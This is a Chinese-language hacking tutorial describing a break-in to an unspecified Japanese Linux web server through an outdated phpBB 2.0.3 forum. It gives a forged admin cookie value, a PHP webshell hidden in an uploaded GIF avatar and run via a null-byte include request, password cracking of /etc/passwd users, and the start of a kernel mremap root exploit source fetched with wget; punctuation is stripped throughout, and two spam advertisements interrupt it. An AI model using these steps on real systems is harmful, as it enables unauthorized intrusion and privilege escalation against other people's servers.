通过phpbb拿日本linux主机系统权限.doc

通过PHPBB拿日本linux主机系统权限文/KYO王智磊最近公司不是很忙，我和我同学（也是同事）对LINUX产生了极大的兴趣。于是都在虚拟机上装了redhat9.0，基本操作熟悉了以后总感觉还是找个肉鸡好玩些，并且决定玩就要玩日本，大家都知道日本的WEB服务器最喜欢用*nix，个人感觉日本70的网站都是用*nixapache的构建方式。***************************************************************这里插播个广告，黑友们请无视，只是为朋友的网站能被搜索引擎收录，多加点流量。http//返利网,淘你喜欢,淘宝返利,淘宝返现购物。***************************************************************当然那些溢出apache的0day的程序我们没有，所以决定还是先从WEBSHELL下手，然后想办法提升权限。怎么找目标呢首先可以考虑CGI漏洞，从这个地方入手肯定能找到很多口子，不过这个以后再说，今天就谈一下大家都熟悉的PHPBB这个论坛，因为最近暴出了不少关于这个论坛的漏洞，另外这个论坛应用也蛮广泛的。打开www.google.co.jp输入关键字poweredbyphpbb,出来很多，随便找到一个版本比较低的PHPBB论坛。地址为http//www.***.org,可以看到是phpbb2.0.3,这样可以利用修改COOKIES进入后台。打开iecv.，编辑COOKIES，把vaule替换为a2{s11autologinid;b1;s6userid;s12;}然后保存以后，关掉网页，重新再打开一次，就变成管理员了。点击下面的GotoAdministrationPanel链接进入后台。现在我想大家关心的是怎么通过后台拿到一个WEBSHELL了。具体原理在这里我就不多说了，就是利用把00进行url编码一次253030，include成功被截断，那么我们可以利用../来调用文件。我们把phpshell代码保存为gif或其他图片格式，在通过论坛上传然后利用构造install_to而被include调用并执行。好了现在是找到上传的地方，进后台一看，发现他的个人头像上传是关闭的。把上面3个设置全部改为yes,头像大小默认为80 x80,这个最好也改大点，省的一会传图片的时候因为太大不能传还要回来改。OK，准备工作做完后，来到首页，打开http//www.****.org/forum/profile.phpmodeeditprofile可以看到传图片的地方了，把我们精心构造的含有的图片test.gif做为头像传上去，并查看源代码记下来gif的路径。因为这个论坛比较特殊，那个图片目录不可写，我改到tmp目录，所以我这里路径为../../../../../../../../../../tmp/dcf91e05431c8366e40a9.gif.然后我们用http//www.****.org/forum/admin/admin_styles.phpmodeaddnewinstall_to../../../../../../../../../../tmp/dcf91e05431c8366e40a9.gif253030sidd915682df5d0e9bfbd2b621828a0c0e5在lanker的一句话马客户端提交就可以得到一个可爱的webshell了。***************************************************************这里插播个广告，黑友们请无视，只是为朋友的网站能被搜索引擎收录，多加点流量。http//返利网,淘你喜欢,淘宝返利,淘宝返现购物。***************************************************************在这里要说一下的是最后的那个sid的值是你进后台页面的地址的后面的那个值复制过来的。好了，这个后门实在不是很好看，再传一个大一点的马吧。这个马看起来就舒服多了，并且执行命令也方便了。现在有了webshell，执行命令id,uid33www-datagid33www-datagroups33www-data,看来权限是很小，接下来就是提升权限。先查看系统的版本，执行命令uname–aLinuxpod-1332.4.22-1-6866SatOct4140908EST2003i686GNU/Linux。正好手上有一个这个版本的溢出程序，可以试一下。预先得知他开了22端口，现在的关键是能找到一个弱口令的帐号通过SSH登陆上去上传我的代码，编译然后执行。执行命令catetc/passwd把执行命令的结果复制下来，然后分离用户，用流光跑了3个小时终于得到一个FTP的弱口令帐户。打开SecureCRT，通过SSH登陆上去。当然权限仍然很低。进来以后用wget传我的溢出代码。/***mremapmissingdo_munmapreturncheckkernelexploit**gcc-O3-static-fomit-frame-pointermremap_pte.c-omremap_pte*./mremap_pte[suid][[shell]]**Copyrightc2004iSECSecurityResearch.AllRightsReserved.**THISPROGRAMISFOREDUCATIONALPURPOSES*ONLY*ITISPROVIDEDASIS*ANDWITHOUTANYWARRANTY.COPYING,PRINTING,DISTRIBUTION,MODIFICATION*WITHOUTPERMISSIONOFTHEAUTHORISSTRICTLYPROHIBITED.**/includeincludeincludeincludeincludeincludeincludeincludeincludeincludeincludeincludedefinestrssdefinexstrsstrs//thisisforstandardkernelswith3/1splitdefineSTARTADDR0 x40000000definePGD_SIZEPAGE_SIZE*1024defineVICTIMSTARTADDRPGD_SIZEdefineMMAP_BASESTARTADDR3*PGD_SIZEdefineDSIGNALSIGCHLDdefineCLONEFLDSIGNAL|CLONE_VFORK|CLONE_VMdefineMREMAP_MAYMOVE1UL65520printf\rMMAPd0 x.8x-0 x.8lx,cnt,base